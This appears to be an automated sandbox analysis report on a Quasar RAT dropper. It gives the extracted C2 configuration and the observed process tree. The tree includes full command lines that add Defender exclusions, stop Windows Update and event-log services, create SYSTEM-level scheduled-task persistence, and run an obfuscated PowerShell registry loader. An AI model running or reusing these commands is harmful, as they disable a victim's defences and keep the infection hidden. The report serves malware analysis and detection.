Analysis
-
max time kernel
19s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
03-01-2025 03:17
Behavioral task
behavioral1
Sample
210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe
Resource
win7-20240708-en
General
-
Target
210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe
-
Size
6.0MB
-
MD5
13b0dec8a2c9291ec13ca9d0f1a98b33
-
SHA1
762c7072179bce1822999dc30c6252262caf6c00
-
SHA256
210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba
-
SHA512
b8b97a630c6f4eca602c756a5a1c29e1cc3354db29176a5b34cb92fd10b14665bde82d01f97c65fbdec3db343e20f6ec67a9e1d3db9c16c280f2e8962d144346
-
SSDEEP
98304:j3GflC+i0bBHXGgjaQx+OhfzTxzdloaDU5BKtxo5fQIwuhkNUwZ:j3GtCj0bR2Ej1hbTxkfzKYAEkXZ
Malware Config
Extracted
quasar
1.4.0
4Drun
185.148.3.216:4000
c3557859-56ac-475e-b44d-e1b60c20d0d0
-
encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
3dfx Startup
-
subdirectory
SubDir
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Quasar family
-
Quasar payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000018741-27.dat family_quasar behavioral1/memory/2604-29-0x0000000000850000-0x00000000008D4000-memory.dmp family_quasar behavioral1/memory/2584-35-0x0000000001230000-0x00000000012B4000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1236 created 432 1236 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1308 powershell.exe 1728 powershell.exe 2640 powershell.exe 2976 powershell.exe 2948 powershell.exe 2248 powershell.exe -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 5 IoCs
pid Process 2844 gfiKDLgr58thy4d.exe 2688 GR55Qg1hth.exe 2604 F4R5fd8grr.exe 2584 Client.exe 2524 Bara.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Loads dropped DLL 4 IoCs
pid Process 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 1256 taskeng.exe -
Power Settings 1 TTPs 18 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2272 powercfg.exe 2140 powercfg.exe 2836 powercfg.exe 876 powercfg.exe 624 powercfg.exe 988 cmd.exe 2872 cmd.exe 2888 powercfg.exe 1944 powercfg.exe 1940 powercfg.exe 1260 powercfg.exe 2720 powercfg.exe 3008 powercfg.exe 1604 powercfg.exe 296 powercfg.exe 1208 powercfg.exe 1480 powercfg.exe 2492 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe gfiKDLgr58thy4d.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2688 set thread context of 3028 2688 GR55Qg1hth.exe 64 PID 1236 set thread context of 1468 1236 powershell.EXE 74 PID 2844 set thread context of 2520 2844 gfiKDLgr58thy4d.exe 92 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Cuis\bon\Bara.exe GR55Qg1hth.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc64.job svchost.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\Tasks\dialersvc32.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe File created C:\Windows\Tasks\dialersvc64.job dialer.exe -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2348 sc.exe 2308 sc.exe 1736 sc.exe 3028 sc.exe 1668 sc.exe 2696 sc.exe 2724 sc.exe 1764 sc.exe 2772 sc.exe 320 sc.exe 1040 sc.exe 2232 sc.exe 300 sc.exe 2932 sc.exe 2228 sc.exe 2140 sc.exe 2640 sc.exe 1924 sc.exe 1848 sc.exe 2784 sc.exe 2796 sc.exe 2016 sc.exe 2900 sc.exe 1944 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2704 WMIC.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4034f1038e5ddb01 powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1660 schtasks.exe 2832 schtasks.exe 1776 schtasks.exe 2096 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 2844 gfiKDLgr58thy4d.exe 1728 powershell.exe 2948 powershell.exe 2204 powershell.exe 1236 powershell.EXE 1236 powershell.EXE 1468 dllhost.exe 1468 dllhost.exe 1468 dllhost.exe 1468 dllhost.exe 1308 powershell.exe 1656 powershell.EXE 1468 dllhost.exe 1468 dllhost.exe 1468 dllhost.exe 1468 dllhost.exe 1468 dllhost.exe 1468 dllhost.exe 2584 Client.exe 1468 dllhost.exe 1468 dllhost.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2844 gfiKDLgr58thy4d.exe 2520 dialer.exe 2520 dialer.exe 2520 dialer.exe 2520 dialer.exe 2844 gfiKDLgr58thy4d.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2604 F4R5fd8grr.exe Token: SeDebugPrivilege 2584 Client.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeShutdownPrivilege 2888 powercfg.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeShutdownPrivilege 1944 powercfg.exe Token: SeShutdownPrivilege 1940 powercfg.exe Token: SeShutdownPrivilege 1260 powercfg.exe Token: SeDebugPrivilege 2204 powershell.exe Token: SeDebugPrivilege 1236 powershell.EXE Token: SeDebugPrivilege 1236 powershell.EXE Token: SeDebugPrivilege 1468 dllhost.exe Token: SeShutdownPrivilege 1124 Explorer.EXE Token: SeShutdownPrivilege 1124 Explorer.EXE Token: SeAuditPrivilege 844 svchost.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 1656 powershell.EXE Token: SeDebugPrivilege 2844 gfiKDLgr58thy4d.exe Token: SeDebugPrivilege 2520 dialer.exe Token: SeShutdownPrivilege 296 powercfg.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeShutdownPrivilege 1604 powercfg.exe Token: SeShutdownPrivilege 1480 powercfg.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2584 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2160 wrote to memory of 2844 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 31 PID 2160 wrote to memory of 2844 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 31 PID 2160 wrote to memory of 2844 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 31 PID 2160 wrote to memory of 2688 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 32 PID 2160 wrote to memory of 2688 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 32 PID 2160 wrote to memory of 2688 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 32 PID 2160 wrote to memory of 2604 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 33 PID 2160 wrote to memory of 2604 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 33 PID 2160 wrote to memory of 2604 2160 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe 33 PID 2604 wrote to memory of 2832 2604 F4R5fd8grr.exe 34 PID 2604 wrote to memory of 2832 2604 F4R5fd8grr.exe 34 PID 2604 wrote to memory of 2832 2604 F4R5fd8grr.exe 34 PID 2604 wrote to memory of 2584 2604 F4R5fd8grr.exe 36 PID 2604 wrote to memory of 2584 2604 F4R5fd8grr.exe 36 PID 2604 wrote to memory of 2584 2604 F4R5fd8grr.exe 36 PID 2584 wrote to memory of 1776 2584 Client.exe 37 PID 2584 wrote to memory of 1776 2584 Client.exe 37 PID 2584 wrote to memory of 1776 2584 Client.exe 37 PID 2688 wrote to memory of 1728 2688 GR55Qg1hth.exe 41 PID 2688 wrote to memory of 1728 2688 GR55Qg1hth.exe 41 PID 2688 wrote to memory of 1728 2688 GR55Qg1hth.exe 41 PID 2688 wrote to memory of 2752 2688 GR55Qg1hth.exe 43 PID 2688 wrote to memory of 2752 2688 GR55Qg1hth.exe 43 PID 2688 wrote to memory of 2752 2688 GR55Qg1hth.exe 43 PID 2688 wrote to memory of 2872 2688 GR55Qg1hth.exe 44 PID 2688 wrote to memory of 2872 2688 GR55Qg1hth.exe 44 PID 2688 wrote to memory of 2872 2688 GR55Qg1hth.exe 44 PID 2688 wrote to memory of 2948 2688 GR55Qg1hth.exe 45 PID 2688 wrote to memory of 2948 2688 GR55Qg1hth.exe 45 PID 2688 wrote to memory of 2948 2688 GR55Qg1hth.exe 45 PID 2752 wrote to memory of 1924 2752 cmd.exe 49 PID 2752 wrote to memory of 1924 2752 cmd.exe 49 PID 2752 wrote to memory of 1924 2752 cmd.exe 49 PID 2872 wrote to memory of 2888 2872 cmd.exe 50 PID 2872 wrote to memory of 2888 2872 cmd.exe 50 PID 2872 wrote to memory of 2888 2872 cmd.exe 50 PID 2752 wrote to memory of 2900 2752 cmd.exe 51 PID 2752 wrote to memory of 2900 2752 cmd.exe 51 PID 2752 wrote to memory of 2900 2752 cmd.exe 51 PID 2752 wrote to memory of 1848 2752 cmd.exe 52 PID 2752 wrote to memory of 1848 2752 cmd.exe 52 PID 2752 wrote to memory of 1848 2752 cmd.exe 52 PID 2872 wrote to memory of 1944 2872 cmd.exe 53 PID 2872 wrote to memory of 1944 2872 cmd.exe 53 PID 2872 wrote to memory of 1944 2872 cmd.exe 53 PID 2752 wrote to memory of 1736 2752 cmd.exe 54 PID 2752 wrote to memory of 1736 2752 cmd.exe 54 PID 2752 wrote to memory of 1736 2752 cmd.exe 54 PID 2872 wrote to memory of 1940 2872 cmd.exe 55 PID 2872 wrote to memory of 1940 2872 cmd.exe 55 PID 2872 wrote to memory of 1940 2872 cmd.exe 55 PID 2752 wrote to memory of 320 2752 cmd.exe 56 PID 2752 wrote to memory of 320 2752 cmd.exe 56 PID 2752 wrote to memory of 320 2752 cmd.exe 56 PID 2872 wrote to memory of 1260 2872 cmd.exe 57 PID 2872 wrote to memory of 1260 2872 cmd.exe 57 PID 2872 wrote to memory of 1260 2872 cmd.exe 57 PID 2752 wrote to memory of 1648 2752 cmd.exe 58 PID 2752 wrote to memory of 1648 2752 cmd.exe 58 PID 2752 wrote to memory of 1648 2752 cmd.exe 58 PID 2948 wrote to memory of 2096 2948 powershell.exe 59 PID 2948 wrote to memory of 2096 2948 powershell.exe 59 PID 2948 wrote to memory of 2096 2948 powershell.exe 59 PID 2752 wrote to memory of 2116 2752 cmd.exe 60 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{af0644fc-41ac-43c5-ad78-b72598df6cfb}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{9b83b024-b815-44d4-9736-cb181a8431fa}2⤵PID:752
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:592
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1344
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1472
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Indicator Removal: Clear Windows Event Logs
PID:756
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:808
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1056
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:844 -
C:\Windows\system32\taskeng.exetaskeng.exe {B4C3596B-952B-489E-9B29-7C5988566F0E} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
PID:1256 -
C:\Program Files\Cuis\bon\Bara.exe"C:\Program Files\Cuis\bon\Bara.exe"4⤵
- Executes dropped EXE
PID:2524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Command and Scripting Interpreter: PowerShell
PID:2976
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:2512
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:2796
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:2640
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:1764
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
PID:2772
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
PID:2016
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Power Settings
PID:988 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Power Settings
PID:2720
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Power Settings
PID:2140
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Power Settings
PID:3008
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Power Settings
PID:2836
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }5⤵
- Command and Scripting Interpreter: PowerShell
PID:2248 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"6⤵
- Scheduled Task/Job: Scheduled Task
PID:1660
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe ujznpffbjbh5⤵PID:2268
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"5⤵PID:2324
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor6⤵
- Detects videocard installed
PID:2704
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:236
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1048
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1076
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1156
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:2044
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1772
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:3004
-
-
C:\ProgramData\mxergolzfguk\kaptsegthwf.exeC:\ProgramData\mxergolzfguk\kaptsegthwf.exe2⤵PID:2180
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:2640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2216
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1520
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:2724
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2308
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1944
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:2492
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:876
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:624
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:2272
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2880
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:3036
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵PID:1716
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124 -
C:\Users\Admin\AppData\Local\Temp\210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe"C:\Users\Admin\AppData\Local\Temp\210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe"C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1176
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
- Drops file in Windows directory
PID:1696
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:2232
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3028
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1040
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:300
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:2348
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:296
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WAGDKRVZ"4⤵
- Launches sc.exe
PID:1668
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"4⤵
- Launches sc.exe
PID:2696
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2228
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WAGDKRVZ"4⤵
- Launches sc.exe
PID:2932
-
-
-
C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe"C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
